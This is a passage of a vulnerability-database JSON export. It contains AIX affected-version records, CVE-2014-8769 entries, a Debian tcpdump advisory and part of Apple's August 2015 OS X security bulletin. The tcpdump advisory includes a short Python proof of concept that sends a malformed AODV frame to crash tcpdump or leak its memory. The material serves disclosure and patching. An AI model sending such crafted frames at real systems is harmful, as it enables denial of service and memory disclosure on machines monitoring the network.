"6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": 
"bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}], "aix": {"apars": []}}
{"cve": [{"lastseen": "2018-10-10T11:05:24", "bulletinFamily": "NVD", "description": "tcpdump 3.8 through 4.6.2 might allow remote attackers to obtain sensitive information from memory or cause a denial of service (packet loss or segmentation fault) via a crafted Ad hoc On-Demand Distance Vector (AODV) packet, which triggers an out-of-bounds memory access.", "modified": "2018-10-09T15:54:45", "published": "2014-11-20T12:50:06", "id": "CVE-2014-8769", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8769", "title": "CVE-2014-8769", "type": "cve", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:55", "bulletinFamily": "software", "description": "\r\nCVE-2014-8769 tcpdump unreliable output using malformed AOVD payload\r\n\r\n1. Background\r\n\r\ntcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.\r\n\r\n2. Summary Information\r\n\r\nIt was found out that malformed network traffic (AOVD-based) can lead to an abnormal behaviour if verbose output of tcpdump monitoring the network is used.\r\n\r\n3. Technical Description\r\n\r\nThe application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol fails to perform input validation and performs unsafe out-of-bound accesses. The application will usually not crash, but perform out-of-bounds accesses and output/leak larger amounts of invalid data, which might lead to dropped packets. 
It is unknown if other payload exists that might trigger segfaults.\r\n\r\nTo reproduce start tcpdump on a network interface\r\n\r\nsudo tcpdump -i lo -s 0 -n -v\r\n\r\n(running the program with sudo might hide a possible segfault message on certain environments, see dmesg for details)\r\n\r\nand use the following python program to generate a frame on the network (might also need sudo):\r\n\r\n#!/usr/bin/env python\r\nfrom socket import socket, AF_PACKET, SOCK_RAW\r\ns = socket(AF_PACKET, SOCK_RAW)\r\ns.bind(("lo", 0))\r\n\r\naovd_frame = "\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"\r\n\r\ns.send(aovd_frame)\r\n\r\n4. Affected versions\r\n\r\nAffected versions are 3.8 through 4.6.2\r\n\r\n5. Fix\r\n\r\nThe problem is fixed in the upcoming version tcpdump 4.7.0\r\n\r\n6. Advisory Timeline\r\n\r\n2014-11-08 Discovered\r\n2014-11-09 Requested CVE\r\n2014-11-11 Reported vendor by email\r\n2014-11-12 Vendor made a fix available as repository patch\r\n2014-11-13 CVE number received\r\n2014-11-13 Published CVE advisory\r\n\r\n7. 
Credit\r\n\r\nThe issue was found by\r\n\r\nSteffen Bauch\r\nTwitter: @steffenbauch\r\nhttp://steffenbauch.de\r\n\r\nusing a slightly enhanced version of american fuzzy lop (https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.\r\n", "modified": "2014-11-24T00:00:00", "published": "2014-11-24T00:00:00", "id": "SECURITYVULNS:DOC:31395", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31395", "title": "CVE-2014-8769 tcpdump unreliable output using malformed AOVD payload", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3086-1 security@debian.org\r\nhttp://www.debian.org/security/ Salvatore Bonaccorso\r\nDecember 03, 2014 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : tcpdump\r\nCVE ID : CVE-2014-8767 CVE-2014-8769 CVE-2014-9140\r\nDebian Bug : 770424 770434\r\n\r\nSeveral vulnerabilities have been discovered in tcpdump, a command-line\r\nnetwork traffic analyzer. 
These vulnerabilities might result in denial\r\nof service, leaking sensitive information from memory or, potentially,\r\nexecution of arbitrary code.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 4.3.0-1+deb7u1.\r\n\r\nFor the upcoming stable distribution (jessie), these problems have been\r\nfixed in version 4.6.2-3.\r\n\r\nFor the unstable distribution (sid), these problems have been fixed in\r\nversion 4.6.2-3.\r\n\r\nWe recommend that you upgrade your tcpdump packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n", "modified": "2014-12-03T00:00:00", "published": "2014-12-03T00:00:00", "id": "SECURITYVULNS:DOC:31477", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31477", "title": "[SECURITY] [DSA 3086-1] tcpdump security update", "type": "securityvulns", "cvss": {"score": 6.4, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "description": "DoS, code execution, information leakage.", "modified": "2014-12-03T00:00:00", "published": "2014-12-03T00:00:00", "id": "SECURITYVULNS:VULN:14136", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14136", "title": "tcpdump multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "description": "Buffer overflow and DoS-conditions on different protocols parsing.", "modified": "2014-11-24T00:00:00", "published": "2014-11-24T00:00:00", "id": "SECURITYVULNS:VULN:14095", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14095", "title": "wireshark multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:01", "bulletinFamily": "software", "description": "Over 150 different vulnerabilities in system components and libraries.", "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:VULN:14630", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14630", "title": "Apple Mac OS X / OS X Server multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:00", "bulletinFamily": "software", "description": "\r\n\r\nAPPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update\r\n2015-006\r\n\r\nOS X Yosemite v10.10.5 and Security Update 2015-006 is now available\r\nand addresses the following:\r\n\r\napache\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Apache 2.4.16, the 
most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in Apache versions\r\nprior to 2.4.16. These were addressed by updating Apache to version\r\n2.4.16.\r\nCVE-ID\r\nCVE-2014-3581\r\nCVE-2014-3583\r\nCVE-2014-8109\r\nCVE-2015-0228\r\nCVE-2015-0253\r\nCVE-2015-3183\r\nCVE-2015-3185\r\n\r\napache_mod_php\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in PHP 5.5.20, the most\r\nserious of which may lead to arbitrary code execution.\r\nDescription: Multiple vulnerabilities existed in PHP versions prior\r\nto 5.5.20. These were addressed by updating Apache to version 5.5.27.\r\nCVE-ID\r\nCVE-2015-2783\r\nCVE-2015-2787\r\nCVE-2015-3307\r\nCVE-2015-3329\r\nCVE-2015-3330\r\nCVE-2015-4021\r\nCVE-2015-4022\r\nCVE-2015-4024\r\nCVE-2015-4025\r\nCVE-2015-4026\r\nCVE-2015-4147\r\nCVE-2015-4148\r\n\r\nApple ID OD Plug-in\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to change the password of a\r\nlocal user\r\nDescription: In some circumstances, a state management issue existed\r\nin password authentication. The issue was addressed through improved\r\nstate management.\r\nCVE-ID\r\nCVE-2015-3799 : an anonymous researcher working with HP's Zero Day\r\nInitiative\r\n\r\nAppleGraphicsControl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in AppleGraphicsControl which could\r\nhave led to the disclosure of kernel memory layout. 
This issue was\r\naddressed through improved bounds checking.\r\nCVE-ID\r\nCVE-2015-5768 : JieTao Yang of KeenTeam\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in\r\nIOBluetoothHCIController. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3779 : Teddy Reed of Facebook Security\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: A memory management issue could have led to the\r\ndisclosure of kernel memory layout. This issue was addressed with\r\nimproved memory management.\r\nCVE-ID\r\nCVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious app may be able to access notifications from\r\nother iCloud devices\r\nDescription: An issue existed where a malicious app could access a\r\nBluetooth-paired Mac or iOS device's Notification Center\r\nnotifications via the Apple Notification Center Service. The issue\r\naffected devices using Handoff and logged into the same iCloud\r\naccount. This issue was resolved by revoking access to the Apple\r\nNotification Center Service.\r\nCVE-ID\r\nCVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security\r\nLab (Indiana University), Tongxin Li (Peking University), XiaoFeng\r\nWang (Indiana University)\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with privileged network position may be able to\r\nperform denial of service attack using malformed Bluetooth packets\r\nDescription: An input validation issue existed in parsing of\r\nBluetooth ACL packets. 
This issue was addressed through improved\r\ninput validation.\r\nCVE-ID\r\nCVE-2015-3787 : Trend Micro\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local attacker may be able to cause unexpected application\r\ntermination or arbitrary code execution\r\nDescription: Multiple buffer overflow issues existed in blued's\r\nhandling of XPC messages. These issues were addressed through\r\nimproved bounds checking.\r\nCVE-ID\r\nCVE-2015-3777 : mitp0sh of [PDX]\r\n\r\nbootp\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious Wi-Fi network may be able to determine networks\r\na device has previously accessed\r\nDescription: Upon connecting to a Wi-Fi network, iOS may have\r\nbroadcast MAC addresses of previously accessed networks via the DNAv4\r\nprotocol. This issue was addressed through disabling DNAv4 on\r\nunencrypted Wi-Fi networks.\r\nCVE-ID\r\nCVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,\r\nUniversity of Oxford (on the EPSRC Being There project)\r\n\r\nCloudKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access the iCloud\r\nuser record of a previously signed in user\r\nDescription: A state inconsistency existed in CloudKit when signing\r\nout users. 
This issue was addressed through improved state handling.\r\nCVE-ID\r\nCVE-2015-3782 : Deepkanwal Plaha of University of Toronto\r\n\r\nCoreMedia Playback\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in CoreMedia Playback.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5777 : Apple\r\nCVE-2015-5778 : Apple\r\n\r\nCoreText\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ncurl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities in cURL and libcurl prior to\r\n7.38.0, one of which may allow remote attackers to bypass the Same\r\nOrigin Policy.\r\nDescription: Multiple vulnerabilities existed in cURL and libcurl\r\nprior to 7.38.0. 
These issues were addressed by updating cURL to\r\nversion 7.43.0.\r\nCVE-ID\r\nCVE-2014-3613\r\nCVE-2014-3620\r\nCVE-2014-3707\r\nCVE-2014-8150\r\nCVE-2014-8151\r\nCVE-2015-3143\r\nCVE-2015-3144\r\nCVE-2015-3145\r\nCVE-2015-3148\r\nCVE-2015-3153\r\n\r\nData Detectors Engine\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a sequence of unicode characters can lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in processing of\r\nUnicode characters. These issues were addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)\r\n\r\nDate & Time pref pane\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Applications that rely on system time may have unexpected\r\nbehavior\r\nDescription: An authorization issue existed when modifying the\r\nsystem date and time preferences. This issue was addressed with\r\nadditional authorization checks.\r\nCVE-ID\r\nCVE-2015-3757 : Mark S C Smith\r\n\r\nDictionary Application\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with a privileged network position may be able\r\nto intercept users' Dictionary app queries\r\nDescription: An issue existed in the Dictionary app, which did not\r\nproperly secure user communications. This issue was addressed by\r\nmoving Dictionary queries to HTTPS.\r\nCVE-ID\r\nCVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security\r\nTeam\r\n\r\nDiskImages\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. 
This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team\r\n\r\ndyld\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed in dyld. This was\r\naddressed through improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3760 : beist of grayhash, Stefan Esser\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-3804 : Apple\r\nCVE-2015-5775 : Apple\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ngroff\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple issues in pdfroff\r\nDescription: Multiple issues existed in pdfroff, the most serious of\r\nwhich may allow arbitrary filesystem modification. 
These issues were\r\naddressed by removing pdfroff.\r\nCVE-ID\r\nCVE-2009-5044\r\nCVE-2009-5078\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nTIFF images. This issue was addressed through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2015-5758 : Apple\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Visiting a maliciously crafted website may result in the\r\ndisclosure of process memory\r\nDescription: An uninitialized memory access issue existed in\r\nImageIO's handling of PNG and TIFF images. Visiting a malicious\r\nwebsite may result in sending data from process memory to the\r\nwebsite. This issue is addressed through improved memory\r\ninitialization and additional validation of PNG and TIFF images.\r\nCVE-ID\r\nCVE-2015-5781 : Michal Zalewski\r\nCVE-2015-5782 : Michal Zalewski\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with root privileges\r\nDescription: An issue existed in how Install.framework's 'runner'\r\nbinary dropped privileges. This issue was addressed through improved\r\nprivilege management.\r\nCVE-ID\r\nCVE-2015-5784 : Ian Beer of Google Project Zero\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A race condition existed in\r\nInstall.framework's 'runner' binary that resulted in\r\nprivileges being incorrectly dropped. 
This issue was addressed\r\nthrough improved object locking.\r\nCVE-ID\r\nCVE-2015-5754 : Ian Beer of Google Project Zero\r\n\r\nIOFireWireFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: Memory corruption issues existed in IOFireWireFamily.\r\nThese issues were addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3769 : Ilja van Sprundel\r\nCVE-2015-3771 : Ilja van Sprundel\r\nCVE-2015-3772 : Ilja van Sprundel\r\n\r\nIOGraphics\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in IOGraphics. This\r\nissue was addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3770 : Ilja van Sprundel\r\nCVE-2015-5783 : Ilja van Sprundel\r\n\r\nIOHIDFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A buffer overflow issue existed in IOHIDFamily. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5774 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in the mach_port_space_info interface,\r\nwhich could have led to the disclosure of kernel memory layout. This\r\nwas addressed by disabling the mach_port_space_info interface.\r\nCVE-ID\r\nCVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,\r\n@PanguTeam\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: An integer overflow existed in the handling of IOKit\r\nfunctions. 
This issue was addressed through improved validation of\r\nIOKit API arguments.\r\nCVE-ID\r\nCVE-2015-3768 : Ilja van Sprundel\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A resource exhaustion issue existed in the fasttrap\r\ndriver. This was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5747 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A validation issue existed in the mounting of HFS\r\nvolumes. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-5748 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute unsigned code\r\nDescription: An issue existed that allowed unsigned code to be\r\nappended to signed code in a specially crafted executable file. This\r\nissue was addressed through improved code signature validation.\r\nCVE-ID\r\nCVE-2015-3806 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A specially crafted executable file could allow unsigned,\r\nmalicious code to execute\r\nDescription: An issue existed in the way multi-architecture\r\nexecutable files were evaluated that could have allowed unsigned code\r\nto be executed. This issue was addressed through improved validation\r\nof executable files.\r\nCVE-ID\r\nCVE-2015-3803 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute unsigned code\r\nDescription: A validation issue existed in the handling of Mach-O\r\nfiles. 
This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-3802 : TaiG Jailbreak Team\r\nCVE-2015-3805 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted plist may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption existed in processing of malformed\r\nplists. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein\r\n(@jollyjinx) of Jinx Germany\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed. This was addressed\r\nthrough improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3761 : Apple\r\n\r\nLibc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted regular expression may lead\r\nto an unexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in the TRE library.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3796 : Ian Beer of Google Project Zero\r\nCVE-2015-3797 : Ian Beer of Google Project Zero\r\nCVE-2015-3798 : Ian Beer of Google Project Zero\r\n\r\nLibinfo\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in handling AF_INET6\r\nsockets. 
These were addressed by improved memory handling.\r\nCVE-ID\r\nCVE-2015-5776 : Apple\r\n\r\nlibpthread\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling syscalls.\r\nThis issue was addressed through improved lock state checking.\r\nCVE-ID\r\nCVE-2015-5757 : Lufeng Li of Qihoo 360\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in libxml2 versions prior\r\nto 2.9.2, the most serious of which may allow a remote attacker to\r\ncause a denial of service\r\nDescription: Multiple vulnerabilities existed in libxml2 versions\r\nprior to 2.9.2. These were addressed by updating libxml2 to version\r\n2.9.2.\r\nCVE-ID\r\nCVE-2012-6685 : Felix Groebert of Google\r\nCVE-2014-0191 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory access issue existed in libxml2. This was\r\naddressed by improved memory handling\r\nCVE-ID\r\nCVE-2014-3660 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory corruption issue existed in parsing of XML\r\nfiles. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3807 : Apple\r\n\r\nlibxpc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling of\r\nmalformed XPC messages. 
This issue was improved through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-3795 : Mathew Rowley\r\n\r\nmail_cmds\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary shell commands\r\nDescription: A validation issue existed in the mailx parsing of\r\nemail addresses. This was addressed by improved sanitization.\r\nCVE-ID\r\nCVE-2014-7844\r\n\r\nNotification Center OSX\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access all\r\nnotifications previously displayed to users\r\nDescription: An issue existed in Notification Center, which did not\r\nproperly delete user notifications. This issue was addressed by\r\ncorrectly deleting notifications dismissed by users.\r\nCVE-ID\r\nCVE-2015-3764 : Jonathan Zdziarski\r\n\r\nntfs\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in NTFS. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nOpenSSH\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Remote attackers may be able to circumvent a time delay for\r\nfailed login attempts and conduct brute-force attacks\r\nDescription: An issue existed when processing keyboard-interactive\r\ndevices. This issue was addressed through improved authentication\r\nrequest validation.\r\nCVE-ID\r\nCVE-2015-5600\r\n\r\nOpenSSL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in OpenSSL versions prior\r\nto 0.9.8zg, the most serious of which may allow a remote attacker to\r\ncause a denial of service.\r\nDescription: Multiple vulnerabilities existed in OpenSSL versions\r\nprior to 0.9.8zg. 
